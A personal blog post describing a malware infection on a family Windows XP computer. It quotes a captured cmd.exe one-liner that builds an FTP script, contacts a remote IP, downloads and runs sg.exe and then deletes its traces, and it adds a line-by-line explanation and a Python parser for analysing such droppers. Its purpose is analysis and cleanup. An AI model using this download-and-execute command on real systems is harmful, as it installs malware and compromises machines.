Infiltration in Windows!

We have a desktop (with Windows XP installed) which my mother uses for her daily work. Needless to say, she doesn’t know much beyond checking email. So, whenever she has a problem or the comp messes up, I have to do the dirty work.

Recently, my mom thought that the comp had suddenly slowed down and asked me to take a look. The comp was definitely infiltrated. Not only was it unusually slow, but no new temporary file could be created. This is pretty serious, because common things like creating a zip file and burning CDs won’t work. The first thing I did was run chkdsk. I found that one of the files inside TEMP was cross-linked to allocation block 20, at which point chkdsk would hang.

I was randomly messing with the command line, in the hope that something would work, when this script suddenly popped up.

59.95.209.158 43642 >> ij &echo user t g >> ij &echo get sg.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &sg.exe &net start SharedAccess &exit

Interesting!
I don’t think the user is supposed to see this, but something I did (wish I knew what!) made this show up. Now, this was definitely an intrusion of some sort. I don’t know much about this stuff, so I fired this off to my good friend Jitesh Shah. Here is his reply (verbatim):

This script is connecting to a server and downloading sg.exe,
and the ftp options mean the following:
-n = suppress auto-login
-v = suppress display of server responses
-s:filename = specify an ftp file; commands in this file are executed serially, as in a shell script

Each command in a shell script is prefixed by “&”,
e.g. &dir, &cls, etc.

“net start” starts all the services…

Here’s a little summary I managed:
(with a little change in your copy-pasted log; it should have been prefixed by the command “open”, as far as I know)
Here’s what happens:
open 59.95.209.158 43642 >> ij
“ij” is a normal file. Output redirection is used.
i.e. “open 59.95.209.158 43642” is written to a file “ij”

&echo user t g >> ij
The next line in the file is “user t g”, i.e. log in to your computer using username “t” and password “g” (which means that there is a backdoor already installed).

&echo get sg.exe >> ij
Get the file “sg.exe” from the server (probably a virus).

&echo bye >> ij
The “bye” command quits ftp.

&ftp -n -v -s:ij
Execute the ftp command in the shell, with input file ij, which now looks something like this:

ij contents:
open 59.95.209.158 43642
user t g
get sg.exe
bye

&del ij
Remove the file “ij” to cover the traces.

&sg.exe
Execute the downloaded virus file in the shell.

&net start SharedAccess
Start all services, which are, by now, infected.

&exit
Quit the shell. Work done!!
Comp infected!!

Kewl!
So now I’m going to Google this stuff a bit and see if I can get the hang of it. I’ll also see if I can do some reverse engineering on sg.exe. What exactly does this exe do anyway? Is it a service in Windows? I also want to check if this script left some logs, and if I can get the attack IP. Nice! *Rubbing hands in delight!*
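Before chasing sg.exe, it helps to pin down exactly what the one-liner does from its text alone. The script below is an added example; it is not code from the original post or from Jitesh’s reply. It simulates cmd.exe running the “&”-separated segments in order (“&” is cmd.exe’s command separator): each “echo TEXT >> ij” appends a line to the file ij, “ftp -n -v -s:ij” replays that file as ftp.exe commands (-n suppresses auto-login, -v suppresses display of remote server responses, -s: names a text file of FTP commands), and the remaining segments run on the host. The two sample lines are constructed from the transcript quoted above. The second sample restores an “echo open” prefix on the first segment; that prefix is an assumption, made because only echo writes text into ij, whereas a bare “open … >> ij” would leave the file empty and print a “not recognized” error.

```python
"""Reconstruct what a cmd.exe FTP-dropper one-liner does, from its text alone.
Added example, not code from the post or from Jitesh's reply. It models cmd.exe
running the "&"-separated segments in order: "echo TEXT >> FILE" appends a line to
FILE, "ftp -n -v -s:FILE" replays FILE as ftp.exe commands, the rest run locally.
Samples are constructed from the post; the "echo open" prefix is an assumption.
"""
import re
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class DropperReport:
    script_files: dict = field(default_factory=dict)  # file -> lines written by echo
    ftp_script: Optional[str] = None                  # file named by ftp -s:
    ftp_server: Optional[str] = None
    ftp_port: int = 21                                # ftp.exe default when open has no port
    ftp_user: Optional[str] = None
    ftp_password: Optional[str] = None
    downloads: list = field(default_factory=list)     # files fetched from the server
    executed: list = field(default_factory=list)      # programs run on the host
    deleted: list = field(default_factory=list)
    services_started: list = field(default_factory=list)
    unparsed: list = field(default_factory=list)      # segments this model does not cover


def split_cmd_chain(cmdline: str) -> list:
    """Split on cmd.exe's '&' command separator, ignoring '&' inside double quotes."""
    parts, buf, in_quote = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
        if ch == "&" and not in_quote:
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf).strip())
    return [p for p in parts if p]


ECHO_RE = re.compile(r"^echo\s+(?P<text>.*?)\s*(?P<op>>>|>)\s*(?P<file>\S+)$", re.I)
FTP_RE = re.compile(r"^ftp\b.*?-s:(?P<file>\S+)", re.I)


def replay_ftp_script(lines: list, report: DropperReport) -> None:
    """Walk the command file the way ftp.exe -s: would, recording what it does."""
    for line in lines:
        tokens = line.split()
        if not tokens:
            continue
        verb, args = tokens[0].lower(), tokens[1:]
        if verb == "open" and args:            # open HOST [PORT]
            report.ftp_server = args[0]
            if len(args) > 1 and args[1].isdigit():
                report.ftp_port = int(args[1])
        elif verb == "user" and args:          # user NAME [PASSWORD], sent to that server
            report.ftp_user = args[0]
            report.ftp_password = args[1] if len(args) > 1 else None
        elif verb in ("get", "recv") and args:  # get REMOTE [LOCAL]
            report.downloads.append(args[0])
        elif verb in ("bye", "quit"):
            break


def parse_dropper(cmdline: str) -> DropperReport:
    """Simulate the one-liner segment by segment and return what it did."""
    report = DropperReport()
    for seg in split_cmd_chain(cmdline):
        m = ECHO_RE.match(seg)
        if m:
            lines = report.script_files.setdefault(m["file"], [])
            if m["op"] == ">":                 # a single > truncates before writing
                lines.clear()
            lines.append(m["text"])
            continue
        m = FTP_RE.match(seg)
        if m:                                  # ftp runs with whatever the file holds now
            report.ftp_script = m["file"]
            replay_ftp_script(report.script_files.get(m["file"], []), report)
            continue
        tokens = seg.split()
        verb = tokens[0].lower()
        if verb == "del":
            report.deleted.extend(tokens[1:])
        elif verb == "net" and len(tokens) >= 3 and tokens[1].lower() == "start":
            report.services_started.append(tokens[2])
        elif verb == "exit":
            pass
        elif verb == "start" or verb.endswith(".exe"):
            report.executed.append(tokens[-1] if verb == "start" else tokens[0])
        else:
            report.unparsed.append(seg)
    return report


# Constructed sample 1: the transcript exactly as quoted in the post.
CAPTURED = ("59.95.209.158 43642 >> ij &echo user t g >> ij &echo get sg.exe >> ij "
            "&echo bye >> ij &ftp -n -v -s:ij &del ij &sg.exe &net start SharedAccess &exit")
# Constructed sample 2: the same line with the lost "echo open" prefix restored (assumption).
RECONSTRUCTED = "echo open " + CAPTURED

if __name__ == "__main__":
    for label, line in (("captured", CAPTURED), ("reconstructed", RECONSTRUCTED)):
        r = parse_dropper(line)
        print(f"[{label}] server={r.ftp_server}:{r.ftp_port} login={r.ftp_user}/{r.ftp_password}")
        print(f"  {r.ftp_script} held {r.script_files.get(r.ftp_script)}; downloads={r.downloads} "
              f"executed={r.executed} deleted={r.deleted} services={r.services_started} "
              f"unparsed={r.unparsed}")
```

Run as-is, it prints one report per sample. The captured fragment on its own proves the credentials, the fetched file name, the deleted script and the started service, but names no server, because the line that would carry it is the one that was lost; the reconstructed line yields the address and port as well. Two points of ftp.exe semantics matter when reading the output: the “user” line is what the local ftp client sends to whatever host “open” names, so “t”/“g” are credentials for the remote FTP server, and 43642 is the port that server listens on rather than the standard 21. Those, together with the names ij and sg.exe in %TEMP% and a process-creation record for ftp.exe with “-s:”, are the artefacts worth hunting for on the box.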

UPDATE:
Surprise!
I couldn’t find any sg.exe on the desktop. Maybe I interrupted the script? Dunno… Here’s a screenshot though; check out the temp folder!
